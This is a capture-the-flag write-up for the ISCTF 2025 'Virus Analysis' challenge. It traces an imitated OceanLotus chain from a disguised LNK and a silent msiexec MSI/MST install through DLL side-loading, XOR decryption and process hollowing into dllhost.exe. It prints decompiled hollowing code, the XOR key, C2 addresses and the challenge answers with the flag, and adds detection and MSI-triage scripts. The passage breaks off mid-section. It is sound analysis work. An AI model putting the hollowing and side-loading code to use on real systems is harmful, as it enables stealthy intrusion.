Virus Analysis (ISCTF 2025 writeup)

张小明 2026/1/1 10:49:00
Virus Analysis

Note 1: This challenge imitates the tradecraft of a recently active APT (Advanced Persistent Threat) group so that it resembles a real-world intrusion. It is designed not to damage the system, so running it on a physical machine is fine; the cleanup procedure will be given in the official writeup.
Note 2: For the challenge to run properly, extract the files into C:\Windows\System32.
Note 3: Except for the last one, all challenges in this series are question-and-answer; the answers do not need to be wrapped in ISCTF{}.

Reference writeups:
https://crystal.stellalyr.ink/2025/12/03/ISCTF-2025-Virus-Analysis/
https://huoya.work/bk/index.php/archives/553/

Answers

Q1 Chinese codename of the imitated APT group: 海莲花 (OceanLotus)
Q2 Full name of the stage 1 entry file: ISCTF基础规则说明文档.pdf.lnk
Q3 Signer of the digitally signed stage 1 file: Zoom Video Communications, Inc.
Q4 The three files dropped by the stage 1 payload: ISCTF2025基础规则说明文档.pdf, zRCAppCore.dll, zRC.dat
Q5 The "black" file in the stage 2 white-plus-black (DLL side-loading) trick: zRCAppCore.dll
Q6 Algorithm stage 2 uses to protect the next-stage payload: xor
Q7 Key stage 2 uses to protect the next-stage payload: tf7*TV8u
Q8 Open-source protector used on the stage 3 payload: upx
Q9 First callback domain of the stage 3 payload: colonised-my.sharepoint.com
Q10 Address the stage 3 payload contacts to fetch commands: 47.252.28.78:37204
Q11 Content sent when fetching commands: get_cmd
Q12 Flag obtained by visiting the final callback address: ISCTF{Wow!_Y0u_F0uNd_C2_AdDr3sssss!}

Overview

1. Complete attack chain

LNK file → msiexec runs → MSI + MST silent install → payload.dll dropped → Utils() executed → decoy PDF, zRCAppCore.dll and zRC.dat dropped → Zoom component loads zRCAppCore.dll → zRC.dat XOR-decrypted → process hollowing into dllhost.exe → decrypted PE runs → anti-VM checks → callback to the SharePoint domain → C2 configuration fetched → connection to the real C2 (47.252.28.78:37204) → get_cmd sent → flag obtained

2. Techniques

Disguise: legitimate Zoom signature, decoy PDF, silent install
Persistence: the MSI install mechanism, plus a scheduled task named ZoomUpdater created by the final stage
Defense evasion: DLL side-loading (white-plus-black), process hollowing, UPX packing, anti-VM checks
Data protection: XOR encryption, custom-alphabet Base64 encoding
Network: multi-stage C2, with SharePoint used as an intermediate dead-drop node

Stage 0: entry file and execution chain

1. File overview

Extracting the attachment yields three files:

ISCTF基础规则说明文档.pdf.lnk
TJe1w
fR6Wl

TJe1w and fR6Wl carry the hidden attribute, and Windows Explorer never shows the .lnk extension, so the folder appears to contain a single "PDF file". What the user actually clicks is a shortcut: a textbook social-engineering entry point.

TJe1w is the MSI package, the "white" (legitimate) shell.
fR6Wl is an MST transform, the "black" file that modifies the MSI's behaviour.

Searching for "APT MSI" leads to the origin of the technique: https://ti.qianxin.com/blog/articles/new%20-trend-in-msi-file-abuse-new-oceanlotus-group-first-to-use-mst-files-to-deliver-special-trojan-cn/

2. Execution command analysis

Right-click the .lnk and open Properties; the target is:

```
C:\Windows\System32\msiexec.exe /i Tje1w TRANSFORMS=fR6Wl /qn
```

The parameters are the key to this step:

msiexec.exe: the Windows Installer engine, shipped with the OS and "trusted" by appearance
/i Tje1w: install an MSI; the missing extension is the obfuscation
TRANSFORMS=fR6Wl: apply an MST transform during the install; this is where the malicious changes usually live
/qn: quiet, no UI; the install runs without the user noticing anything

So this is not "some exe doing something bad" but "an install workflow that has been rewritten".
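The chain summarised in the overview leaves a clear trail in process-creation and network telemetry. The following is an added example, not code from the writeup or the challenge: a detection pass over constructed Sysmon-style events (EventID 1 process creation, EventID 3 network connection). The field names and the sample events are constructed for illustration; the indicators (msiexec with TRANSFORMS= and /qn, dllhost.exe with an unexpected parent, the ZoomUpdater task, outbound traffic from dllhost.exe) come from the analysis. It goes beyond stage 0 and covers the later stages of the same chain.

```python
# Added example (not part of the writeup): flag each link of the chain in
# constructed Sysmon-style events. Field names and events are constructed.
import re

SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\System32\msiexec.exe /i Tje1w TRANSFORMS=fR6Wl /qn"},
    {"id": 1, "image": r"C:\Windows\System32\dllhost.exe",
     "parent": r"C:\Program Files (x86)\ZoomRemoteControl\bin\ZoomRemoteControl.exe",
     "cmdline": r"C:\Windows\System32\dllhost.exe"},
    {"id": 1, "image": r"C:\Windows\System32\schtasks.exe",
     "parent": r"C:\Windows\System32\dllhost.exe",
     "cmdline": r"schtasks /query /tn ZoomUpdater"},
    {"id": 3, "image": r"C:\Windows\System32\dllhost.exe",
     "dest_host": "colonised-my.sharepoint.com", "dest_port": 443},
    # benign noise: a normal COM surrogate and a normal service connection
    {"id": 1, "image": r"C:\Windows\System32\dllhost.exe",
     "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\dllhost.exe /Processid:{CONSTRUCTED-GUID}"},
    {"id": 3, "image": r"C:\Windows\System32\svchost.exe",
     "dest_host": "login.microsoftonline.com", "dest_port": 443},
]

PKG_RE = re.compile(r"(?<!\S)[/-]i\s+(\S+)", re.I)          # /i <package>
MST_RE = re.compile(r"\bTRANSFORMS=(\S+)", re.I)             # TRANSFORMS=<mst>
QUIET_RE = re.compile(r"(?<!\S)[/-]q[nb]?(?!\S)", re.I)      # /q, /qn, /qb
TASK_RE = re.compile(r"[/-]tn\s+ZoomUpdater(?!\S)", re.I)    # /tn ZoomUpdater

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def check_process(ev: dict) -> list:
    hits = []
    image, parent = basename(ev["image"]), basename(ev.get("parent", ""))
    cmd = ev.get("cmdline", "")
    pkg, mst = PKG_RE.search(cmd), MST_RE.search(cmd)
    if image == "msiexec.exe" and pkg and mst:
        hits.append(("msiexec_transform", {
            "package": pkg.group(1), "transform": mst.group(1),
            "quiet": QUIET_RE.search(cmd) is not None,
            "no_msi_ext": "." not in basename(pkg.group(1)),   # extension-less package
        }))
    # dllhost.exe is normally a COM surrogate started by svchost with /Processid:
    if image == "dllhost.exe" and (parent != "svchost.exe" or "/processid:" not in cmd.lower()):
        hits.append(("dllhost_unusual_parent", {"parent": parent}))
    if image == "schtasks.exe" and TASK_RE.search(cmd):
        hits.append(("schtasks_zoomupdater", {"cmdline": cmd}))
    return hits

def check_network(ev: dict) -> list:
    # a COM surrogate has no business talking to the internet on its own
    if basename(ev["image"]) == "dllhost.exe":
        return [("dllhost_outbound", {"host": ev.get("dest_host"), "port": ev.get("dest_port")})]
    return []

def scan(events) -> list:
    hits = []
    for ev in events:
        hits += check_process(ev) if ev["id"] == 1 else check_network(ev) if ev["id"] == 3 else []
    return hits

if __name__ == "__main__":
    for rule, details in scan(SAMPLE_EVENTS):
        print(rule, details)
```

The msiexec rule deliberately keys on the combination (transform applied, quiet, package without an .msi extension) rather than on the file names TJe1w/fR6Wl, which are specific to this sample; the dllhost rule is the one most worth tuning, since legitimate COM surrogates always carry /Processid: and a svchost.exe parent.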
3. Digital signature verification

Check the signatures with Sigcheck:

```
C:\Windows\System32\ISCTF>C:\Windows\System32\Sigcheck\sigcheck.exe -q C:\Windows\System32\ISCTF\*

Sigcheck v2.90 - File version and signature viewer
Copyright (C) 2004-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

c:\windows\system32\isctf\fR6Wl:
        Verified:       Unsigned
        File date:      19:54 2025/12/1
        Publisher:      n/a
        Company:        n/a
        Description:    n/a
        Product:        n/a
        Prod version:   n/a
        File version:   n/a
        MachineType:    n/a
c:\windows\system32\isctf\ISCTF????????.pdf.lnk:
        Verified:       Unsigned
        File date:      20:56 2025/12/1
        Publisher:      n/a
        Company:        n/a
        Description:    n/a
        Product:        n/a
        Prod version:   n/a
        File version:   n/a
        MachineType:    n/a
c:\windows\system32\isctf\TJe1w:
        Verified:       Signed
        Signing date:   14:29 2025/6/11
        Publisher:      Zoom Video Communications, Inc.
        Company:        n/a
        Description:    n/a
        Product:        n/a
        Prod version:   n/a
        File version:   n/a
        MachineType:    n/a
```

(The question marks in the .lnk name are just the console failing to render the Chinese characters.)

Result: TJe1w (the .msi) is signed by Zoom Video Communications, Inc.; fR6Wl (the .mst) is unsigned. A transform is not covered by the package's Authenticode signature, so a valid signature on the MSI says nothing about what the install will actually do.

4. MSI/MST abuse

Start by diffing the two files. Rename them for readability:

TJe1w → base.msi
fR6Wl → evil.mst

1. Open base.msi in Orca (https://developer.microsoft.com/zh-cn/windows/downloads/windows-sdk/; when installing the Windows SDK, selecting only "MSI Tools" is enough to get Orca.msi).
   Tip: Orca is a 32-bit program. When it accesses C:\Windows\System32 the system redirects it to C:\Windows\SysWOW64 and it reports "path does not exist"; copy the two files somewhere else first and drag them in from there.
2. Given the usual white-plus-black strategy, the .msi is normally a clean "white" file. Here base.msi is the Zoom Remote Control Installer, a legitimate Zoom package. Since the "white" half will not harm Windows, the changes made by the "black" .mst are what need attention.
3. Menu Transform → Apply Transform... → select evil.mst.
4. Look at the tables that changed. Four tables were modified.

4.1 Binary table (where binary streams are hidden; the usual place to store a payload)

A new row appears:

Name = zTool
Data = [Binary Data]

Meaning: the transform adds a binary stream named zTool to the Binary table. Double-click [Binary Data]; in the Edit Binary Stream dialog choose the action "Write binary to file" and give it a filename to save the stream. Save it as Payload; loading it in IDA shows it is actually Payload.dll, the stage 1 malicious payload.

The next table also tells us why it is a DLL: the CustomAction Type is 2305 = 0x900 + 1, and a low part equal to 1 means "DLL stored in a Binary table stream", so the blob in the Binary table is a DLL.

4.2 CustomAction table: new RunTools action

A new row appears:

Action = RunTools
Source = zTool      (the action depends on the zTool stream in the Binary table)
Target = Utils      (for a DLL action this is the exported function to call; the later IDA analysis confirms an export Utils())
Type   = 2305       (a bit combination of MSI custom action type flags)

Taken together: a custom action named RunTools is defined whose code comes from the Binary table stream zTool and whose target is Utils; for a type 1 (DLL) action that means the export Utils is called.
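Reading the three tables together is the whole triage of an MSI/MST pair, and the Type value is a bit field rather than a magic number. The following is an added example, not code from the writeup, from Zoom or from the challenge: it decodes a CustomAction Type into its flags and correlates Binary, CustomAction and InstallExecuteSequence rows the way the Orca diff above is read. The rows are constructed to mirror what the diff shows; the stream bytes are a stand-in for Payload.dll, and the Sequence number 1501 for RunTools is an assumption (the writeup does not give it).

```python
# Added example (not from the writeup): decode MSI CustomAction.Type bits and
# correlate the tables touched by the transform. Rows below are constructed.

KINDS = {1: "DLL", 2: "EXE", 3: "text", 5: "JScript", 6: "VBScript", 7: "nested MSI"}
SOURCES = {0x00: "Binary table stream", 0x10: "installed file (File table)",
           0x20: "Directory table / inline text", 0x30: "Property"}

def decode_custom_action_type(t: int) -> dict:
    """Split a CustomAction.Type value into basic type, source and option flags."""
    flags = []
    if t & 0x40:
        flags.append("Continue")          # ignore the action's return code
    if t & 0x80:
        flags.append("Async")
    sched = t & 0x700
    if sched & 0x400:
        flags.append("InScript")          # deferred: runs from the install script
        if sched & 0x100:
            flags.append("Rollback")
        if sched & 0x200:
            flags.append("Commit")
    elif sched == 0x100:
        flags.append("FirstSequence")
    elif sched == 0x200:
        flags.append("OncePerProcess")
    elif sched == 0x300:
        flags.append("ClientRepeat")
    if t & 0x800:
        flags.append("NoImpersonate")     # run in the installer's own (SYSTEM) context
    if t & 0x1000:
        flags.append("64BitScript")
    if t & 0x2000:
        flags.append("HideTarget")        # Target is not written to the log
    if t & 0x4000:
        flags.append("TSAware")
    if t & 0x8000:
        flags.append("PatchUninstall")
    return {"kind": KINDS.get(t & 0x7, f"unknown({t & 0x7})"),
            "source": SOURCES[t & 0x30], "flags": flags}

# Constructed rows mirroring the Orca view of base.msi with evil.mst applied
BINARY = [{"Name": "zTool", "Data": b"MZ\x90\x00" + b"\x00" * 60}]    # stand-in for Payload.dll
CUSTOM_ACTION = [{"Action": "RunTools", "Type": 2305, "Source": "zTool", "Target": "Utils"}]
INSTALL_EXECUTE_SEQUENCE = [
    {"Action": "InstallInitialize", "Condition": "", "Sequence": 1500},
    {"Action": "RunTools", "Condition": "", "Sequence": 1501},     # assumed position
    {"Action": "InstallFinalize", "Condition": "", "Sequence": 6600},
]

def triage(binary, custom_actions, sequence) -> list:
    """Report every custom action that executes code from a Binary-table stream."""
    streams = {row["Name"]: row["Data"] for row in binary}
    positions = {row["Action"]: row["Sequence"] for row in sequence}
    findings = []
    for ca in custom_actions:
        info = decode_custom_action_type(ca["Type"])
        if info["source"] != "Binary table stream" or info["kind"] not in ("DLL", "EXE", "JScript", "VBScript"):
            continue
        data = streams.get(ca["Source"], b"")
        findings.append({
            "action": ca["Action"], "kind": info["kind"], "stream": ca["Source"],
            "entry": ca["Target"], "is_pe": data[:2] == b"MZ",
            "sequence": positions.get(ca["Action"]),      # None: defined but never scheduled
            "flags": info["flags"],
        })
    return findings

if __name__ == "__main__":
    print(decode_custom_action_type(2305))
    for f in triage(BINARY, CUSTOM_ACTION, INSTALL_EXECUTE_SEQUENCE):
        print(f)
```

For 2305 (0x901) the decoder reports a DLL from a Binary stream with FirstSequence and NoImpersonate; a Binary-stream DLL/EXE action that is also scheduled in InstallExecuteSequence is exactly the pattern to escalate, and a `sequence` of None means the transform added the action but never wired it in.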
Conclusion: the install process loads the zTool DLL from the Binary table and calls its Utils export.

4.3 InstallExecuteSequence table: RunTools inserted into the install flow

This table decides in what order the MSI install executes its actions. Once RunTools is inserted, zTool (payload.dll) is executed at some point during the install; combined with the /qn quiet switch, the malicious code runs in the background.

At this point the MSI/MST injection chain is closed: Transform edits the tables → Binary hides the DLL → CustomAction calls Utils → Sequence decides when it fires.

4.4 File table: dropped-file entries (zRCAppCore.dll / zRC.dat etc.)

The File table contains suspicious entries such as ZRC.DLL|zRC... and zRC.dat. The File table lists the files to be written to disk during the install, and these entries match the drop locations assembled in the decompiled code later (ZoomRemoteControl\bin\...). So the malicious chain not only executes a DLL from the Binary table, it also writes the next-stage files into a specific directory.

Stage 1: payload.dll (zTool) analysis

Load Payload.dll in IDA and search for the Utils function:

```c
int Utils()                 // target of the CustomAction
{
  sub_10001E70();           // drop and open the decoy PDF
  sub_10002230();           // drop zRCAppCore.dll
  sub_10002530();           // drop zRC.dat
  return 0;
}
```

1. Dropping the decoy PDF: sub_10001E70

```c
HRSRC __usercall sub_10001E70@<eax>(int a1@<ebp>)
{
  HRSRC hResInfo; // eax
  HRSRC hResInfo_1; // edi
  HGLOBAL hResData; // esi
  DWORD v4; // edi
  LPVOID v5; // esi
  int *n2147483646; // eax
  int v7; // edx
  int *v8; // eax
  _BYTE *v9; // edx
  __int128 *p_p_lpFile; // eax
  const WCHAR *lpFile; // eax
  void *p_lpFile_2; // edx
  int v13; // ecx
  int v14; // [esp-31Ch] [ebp-32Ch]
  int v15; // [esp-318h] [ebp-328h]
  int v16; // [esp-314h] [ebp-324h]
  _BYTE *v17; // [esp-300h] [ebp-310h]
  unsigned int n7; // [esp-2ECh] [ebp-2FCh]
  _BYTE v19[4]; // [esp-2E8h] [ebp-2F8h]
  int v20; // [esp-2E4h] [ebp-2F4h] BYREF
  int v21; // [esp-2E0h] [ebp-2F0h] BYREF
  void **p_??_7ios_base@std@@6B@; // [esp-27Ch] [ebp-28Ch] BYREF
  __int128 p_lpFile_1; // [esp-234h] [ebp-244h] BYREF
  __int64 v24; // [esp-224h] [ebp-234h]
  WCHAR pszPath_[264]; // [esp-21Ch] [ebp-22Ch] BYREF
  int *v26; // [esp-Ch] [ebp-1Ch]
  struct _EXCEPTION_REGISTRATION_RECORD *ExceptionList; // [esp-8h] [ebp-18h]
  void *v28; // [esp-4h] [ebp-14h]
  int v29; // [esp+0h] [ebp-10h]
  int v30; // [esp+4h] [ebp-Ch]
  void *v31; // [esp+8h] [ebp-8h]
  int v32; // [esp+Ch] [ebp-4h] BYREF
  void *retaddr; // [esp+10h] [ebp+0h]

  v30 = a1;
  v31 = retaddr;
  v29 = -1;
  v28 = &loc_1001D986;
  ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
  v26 = &v32;
  hResInfo = FindResourceW(hModule, (LPCWSTR)0x65, L"PDF");      // resource type "PDF", ID 0x65
  hResInfo_1 = hResInfo;
  if ( hResInfo )
  {
    hResData = LoadResource(hModule, hResInfo);
    v4 = SizeofResource(hModule, hResInfo_1);
    v5 = LockResource(hResData);
    SHGetFolderPathW(0, 5, 0, 0, pszPath_);                       // CSIDL_PERSONAL = Documents
    n2147483646 = (int *)sub_100028D0(pszPath_);
    v29 = 0;
    v8 = sub_10004CD0(n2147483646, v7, aIsctf2025, 0x16u);        // append "\ISCTF2025基础规则说明文档.pdf"
    v24 = 0;
    p_lpFile_1 = 0;
    p_lpFile_1 = *(_OWORD *)v8;
    v24 = *((_QWORD *)v8 + 2);
    v8[4] = 0;
    v8[5] = 7;
    *(_WORD *)v8 = 0;
    LOBYTE(v29) = 2;
    if ( n7 > 7 )
    {
      v9 = v17;
      if ( 2 * n7 + 2 >= 0x1000 )
      {
        v9 = (_BYTE *)*((_DWORD *)v17 - 1);
        if ( (unsigned int)(v17 - v9 - 4) > 0x1F )
        {
          sub_1000A8D1(2 * n7 + 37, 0, 0, 0, 0, 0);
          goto LABEL_18;
        }
      }
      sub_10005E9C(v9);
    }
    sub_10007A70(&v20, 0, 176);
    p_p_lpFile = &p_lpFile_1;
    if ( HIDWORD(v24) > 7 )
      p_p_lpFile = (__int128 *)p_lpFile_1;
    sub_10004160(p_p_lpFile, v14, v15, v16);                      // std::ofstream open
    *(int *)((char *)&v20 + *(_DWORD *)(v20 + 4)) = (int)&std::ofstream::`vftable';
    *(_DWORD *)&v19[*(_DWORD *)(v20 + 4)] = *(_DWORD *)(v20 + 4) - 104;
    LOBYTE(v29) = 3;
    sub_100036F0(v5, v4, 0);                                      // write the resource bytes
    if ( !sub_10004670(&v21) )
      sub_10001D10(
        *(int *)((char *)&v20 + *(_DWORD *)(v20 + 4) + 12) | (4 * (*(int *)((char *)&v20 + *(_DWORD *)(v20 + 4) + 56) == 0)) | 2,
        0);
    lpFile = (const WCHAR *)&p_lpFile_1;
    if ( HIDWORD(v24) > 7 )
      lpFile = (const WCHAR *)p_lpFile_1;
    ShellExecuteW(0, L"open", lpFile, 0, 0, 1);                   // open the decoy
    *(int *)((char *)&v20 + *(_DWORD *)(v20 + 4)) = (int)&std::ofstream::`vftable';
    *(_DWORD *)&v19[*(_DWORD *)(v20 + 4)] = *(_DWORD *)(v20 + 4) - 104;
    sub_10003640();
    *(int *)((char *)&v20 + *(_DWORD *)(v20 + 4)) = (int)&std::ostream::`vftable';
    *(_DWORD *)&v19[*(_DWORD *)(v20 + 4)] = *(_DWORD *)(v20 + 4) - 8;
    LOBYTE(v29) = 4;
    p_??_7ios_base@std@@6B@ = &std::ios_base::`vftable';
    hResInfo = (HRSRC)sub_10005A57(&p_??_7ios_base@std@@6B@);
    if ( HIDWORD(v24) > 7 )
    {
      p_lpFile_2 = (void *)p_lpFile_1;
      if ( (unsigned int)(2 * HIDWORD(v24) + 2) < 0x1000 )
        return (HRSRC)sub_10005E9C(p_lpFile_2);
      p_lpFile_2 = *(void **)(p_lpFile_1 - 4);
      v13 = 2 * HIDWORD(v24) + 37;
      if ( (unsigned int)(p_lpFile_1 - (_DWORD)p_lpFile_2 - 4) <= 0x1F )
        return (HRSRC)sub_10005E9C(p_lpFile_2);
LABEL_18:
      sub_1000A8D1(v13, 0, 0, 0, 0, 0);
      JUMPOUT(0x10002194);
    }
  }
  return hResInfo;
}
```

The file name string in .rdata (the Chinese characters are stored as UTF-16LE code units):

```
.rdata:10027560 ; const wchar_t aIsctf2025[]
.rdata:10027560 aIsctf2025:                             ; DATA XREF: sub_10001E70+AE↑o
.rdata:10027560                 text "UTF-16LE", '\ISCTF2025'
.rdata:10027574                 db 0FAh, 57h, 40h, 78h, 0C4h, 89h, 19h, 52h   ; 基础规则
.rdata:1002757C                 db 0F4h, 8Bh, 0Eh, 66h, 87h, 65h, 63h, 68h    ; 说明文档
.rdata:10027584                 db 2Eh, 0, 70h, 0, 64h, 0, 66h                ; .pdf
```

The function reads the PDF from the resource section (type "PDF", ID 0x65), writes it to %USERPROFILE%\Documents\ISCTF2025基础规则说明文档.pdf (CSIDL 5 passed to SHGetFolderPathW is CSIDL_PERSONAL, the Documents folder) and opens it with ShellExecuteW as the social-engineering decoy.

2. Dropping the "black" DLL: sub_10002230

Reads the DLL from the resource section (type "DLL", ID 0x66) and writes it to C:\Program Files (x86)\ZoomRemoteControl\bin\zRCAppCore.dll, preparing the stage 2 side-loading attack.

3. Dropping the encrypted payload: sub_10002530

Reads encrypted data from the resource section (type "SC", ID 0x67) and writes it to C:\Program Files (x86)\ZoomRemoteControl\bin\zRC.dat; this holds the encrypted stage 3 PE.

Stage 2: zRCAppCore.dll analysis and process injection

Following the above, load payload.dll in Resource Hacker and extract the two files we need: the DLL resource with ID 102 (0x66) is zRCAppCore.dll, and the SC resource with ID 103 (0x67) is zRC.dat. Right-click → Save .bin resource...

1. DLL entry point and where the malicious code is triggered

```c
BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
  if ( fdwReason == 1 )
    sub_100018BE();
  return sub_100015F2(hinstDLL, fdwReason, lpReserved);
}
```

```c
int __cdecl sub_100015F2(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
  void *lpReserved_1; // ebx
  int v5; // esi
  int v6; // eax

  if ( !fdwReason && dword_1001B908 <= 0 )
    return 0;
  if ( fdwReason != 1 && fdwReason != 2 )
  {
    lpReserved_1 = lpReserved;
LABEL_9:
    v6 = sub_100013B0(hinstDLL, fdwReason, lpReserved_1);
    v5 = v6;
    if ( fdwReason == 1 && !v6 )
    {
      sub_100013B0(hinstDLL, 0, lpReserved_1);
      sub_1000153B(lpReserved_1 != 0);
      sub_10001700(hinstDLL, 0, lpReserved_1);
    }
    if ( !fdwReason || fdwReason == 3 )
    {
      v5 = sub_100013DE(hinstDLL, fdwReason, lpReserved_1);
      if ( v5 )
        return sub_10001700(hinstDLL, fdwReason, lpReserved_1);
    }
    return v5;
  }
  lpReserved_1 = lpReserved;
  v5 = sub_10001700(hinstDLL, fdwReason, lpReserved);
  if ( v5 )
  {
    v5 = sub_100013DE(hinstDLL, fdwReason, lpReserved);
    if ( v5 )
      goto LABEL_9;
  }
  return v5;
}
```

When fdwReason == 1 (DLL_PROCESS_ATTACH) the lower branch is taken (the fdwReason != 1 && fdwReason != 2 test fails); after the CRT initialisers sub_10001700 and sub_100013DE succeed it jumps to LABEL_9, which calls sub_100013B0. sub_100013B0 is the real DllMain and the entry of the malicious logic; it triggers the hollowing routine sub_10001050:

```c
int __stdcall sub_100013B0(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
  if ( fdwReason == 1 )
  {
    sub_10001050();
    ExitProcess(0);
  }
  return 1;
}
```

2. Reading and decrypting the file: sub_10001050

```c
BOOL sub_10001050()
{
  HMODULE hModule; // eax
  _BYTE *v1; // eax
  HANDLE hFile; // esi
  _DWORD *lpBuffer; // edi
  SIZE_T nNumberOfBytesToRead_1; // esi
  char *v5; // esi
  HMODULE hModule_1; // eax
  FARPROC NtUnmapViewOfSection; // eax
  LPVOID *v8; // edx
  void *lpBaseAddress; // eax
  int v10; // esi
  SIZE_T nSize; // [esp-8h] [ebp-688h]
  SIZE_T nNumberOfBytesToRead; // [esp+8h] [ebp-678h]
  signed int nNumberOfBytesToReada; // [esp+8h] [ebp-678h]
  char *v15; // [esp+Ch] [ebp-674h]
  _PROCESS_INFORMATION ProcessInformation; // [esp+10h] [ebp-670h] BYREF
  int Buffer; // [esp+2Ch] [ebp-654h] BYREF
  CONTEXT Context; // [esp+30h] [ebp-650h] BYREF
  DWORD NumberOfBytesRead; // [esp+304h] [ebp-37Ch] BYREF
  _STARTUPINFOA StartupInfo; // [esp+308h] [ebp-378h] BYREF
  _DWORD zRC_dat_[3]; // [esp+354h] [ebp-32Ch] BYREF
  CHAR Filename[264]; // [esp+360h] [ebp-320h] BYREF
  char v23[264]; // [esp+468h] [ebp-218h] BYREF
  CHAR FileName[268]; // [esp+570h] [ebp-110h] BYREF

  Context.ContextFlags = 65543;                                  // CONTEXT_FULL
  memset(&StartupInfo.lpReserved, 0, 40);
  ProcessInformation = 0;
  StartupInfo.cb = 68;
  StartupInfo.dwFlags = 1;
  memset(&StartupInfo.wShowWindow, 0, 20);
  hModule = GetModuleHandleW(L"zRCAppCore.dll");
  if ( GetModuleFileNameA(hModule, Filename, 0x104u) )
  {
    v1 = (_BYTE *)sub_10002120(Filename, 92);                    // strrchr(Filename, '\\')
    if ( v1 )
    {
      *v1 = 0;
      sub_10006410(v23, 260, Filename);
      strcpy((char *)zRC_dat_, "zRC.dat");
      sub_10001010(FileName, 260, "%s\\%s", v23, (const char *)zRC_dat_);
    }
  }
  CreateProcessA(0, (LPSTR)"C:\\Windows\\System32\\dllhost.exe", 0, 0, 0, 4u, 0, 0, &StartupInfo, &ProcessInformation); // CREATE_SUSPENDED
  hFile = CreateFileA(FileName, 0x80000000, 1u, 0, 3u, 0, 0);
  nNumberOfBytesToRead = GetFileSize(hFile, 0);
  lpBuffer = VirtualAlloc(0, nNumberOfBytesToRead, 0x3000u, 4u);
  ReadFile(hFile, lpBuffer, nNumberOfBytesToRead, &NumberOfBytesRead, 0);
  CloseHandle(hFile);
  nNumberOfBytesToRead_1 = 0;
  strcpy((char *)zRC_dat_, "tf7*TV8u\n");                        // 9-byte key, trailing newline included
  if ( nNumberOfBytesToRead )
  {
    do
    {
      *((_BYTE *)lpBuffer + nNumberOfBytesToRead_1) ^= *((_BYTE *)zRC_dat_ + nNumberOfBytesToRead_1 % 9);
      ++nNumberOfBytesToRead_1;
    }
    while ( nNumberOfBytesToRead_1 < nNumberOfBytesToRead );
  }
  v5 = (char *)lpBuffer + lpBuffer[15];                          // e_lfanew -> IMAGE_NT_HEADERS
  v15 = v5;
  GetThreadContext(ProcessInformation.hThread, &Context);
  ReadProcessMemory(ProcessInformation.hProcess, (LPCVOID)(Context.Ebx + 8), &Buffer, 4u, 0);   // PEB->ImageBaseAddress
  hModule_1 = GetModuleHandleA("ntdll.dll");
  NtUnmapViewOfSection = GetProcAddress(hModule_1, "NtUnmapViewOfSection");
  v8 = (LPVOID *)(v5 + 52);                                      // OptionalHeader.ImageBase
  if ( Buffer == *((_DWORD *)v5 + 13) )
  {
    ((void (__stdcall *)(HANDLE, int))NtUnmapViewOfSection)(ProcessInformation.hProcess, Buffer);
    v8 = (LPVOID *)(v5 + 52);
  }
  lpBaseAddress = VirtualAllocEx(ProcessInformation.hProcess, *v8, *((_DWORD *)v5 + 20), 0x3000u, 0x40u); // SizeOfImage, RWX
  nSize = *((_DWORD *)v5 + 21);                                  // SizeOfHeaders
  zRC_dat_[0] = lpBaseAddress;
  WriteProcessMemory(ProcessInformation.hProcess, lpBaseAddress, lpBuffer, nSize, 0);
  nNumberOfBytesToReada = 0;
  if ( *((_WORD *)v5 + 3) )                                      // NumberOfSections
  {
    v10 = 0;
    do
    {
      WriteProcessMemory(
        ProcessInformation.hProcess,
        (LPVOID)(zRC_dat_[0] + *(_DWORD *)((char *)&lpBuffer[v10 + 65] + lpBuffer[15])),   // VirtualAddress
        (char *)lpBuffer + *(_DWORD *)((char *)&lpBuffer[v10 + 67] + lpBuffer[15]),        // PointerToRawData
        *(_DWORD *)((char *)&lpBuffer[v10 + 66] + lpBuffer[15]),                           // SizeOfRawData
        0);
      v10 += 10;                                                 // next IMAGE_SECTION_HEADER (40 bytes)
      ++nNumberOfBytesToReada;
    }
    while ( nNumberOfBytesToReada < *((unsigned __int16 *)v15 + 3) );
    v5 = v15;
  }
  Context.Eax = zRC_dat_[0] + *((_DWORD *)v5 + 10);              // base + AddressOfEntryPoint
  WriteProcessMemory(ProcessInformation.hProcess, (LPVOID)(Context.Ebx + 8), v5 + 52, 4u, 0);
  SetThreadContext(ProcessInformation.hThread, &Context);
  ResumeThread(ProcessInformation.hThread);
  CloseHandle(ProcessInformation.hThread);
  return CloseHandle(ProcessInformation.hProcess);
}
```

This implements the complete process-hollowing chain: read zRC.dat → XOR-decrypt → create dllhost.exe suspended → NtUnmapViewOfSection to hollow it → VirtualAllocEx/WriteProcessMemory to write the new PE → SetThreadContext to redirect the entry point → ResumeThread to run it. Note the ExitProcess(0) in sub_100013B0 right after sub_10001050 returns: the Zoom host process that side-loaded the DLL terminates as soon as the injected dllhost.exe has been resumed.

2.1 Locating zRC.dat

```c
GetModuleFileNameA(hModule, Filename, 0x104u);   // own path
// build the full path: ...\ZoomRemoteControl\bin\zRC.dat
```

2.2 XOR decryption

```c
strcpy((char *)zRC_dat_, "tf7*TV8u\n");           // key
for (i = 0; i < nNumberOfBytesToRead; i++) {
    ((BYTE*)lpBuffer)[i] ^= ((BYTE*)zRC_dat_)[i % 9];   // rolling XOR
}
```

Algorithm: XOR. Key: tf7*TV8u; the modulus 9 means the first 9 bytes of the string are used, that is the 8 printable characters plus the trailing newline (0x0A). The newline is easy to miss in a decompiler listing: decrypting with only the 8 printable bytes (i % 8) produces garbage and the MZ check in the script below fails.

3. Process hollowing

3.1 Create the suspended process

```c
CreateProcessA(0, "C:\\Windows\\System32\\dllhost.exe", ..., CREATE_SUSPENDED, ...);
```

3.2 Get the target's context

```c
GetThreadContext(hThread, &Context);
ReadProcessMemory(hProcess, (LPCVOID)(Context.Ebx + 8), &ImageBase, 4, 0);   // Ebx = PEB, PEB+8 = ImageBaseAddress (x86)
```

3.3 Unmap the original image

```c
NtUnmapViewOfSection = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
NtUnmapViewOfSection(hProcess, ImageBase);   // only when dllhost's base equals the payload's preferred ImageBase
```

3.4 Inject the malicious PE

```c
// allocate memory
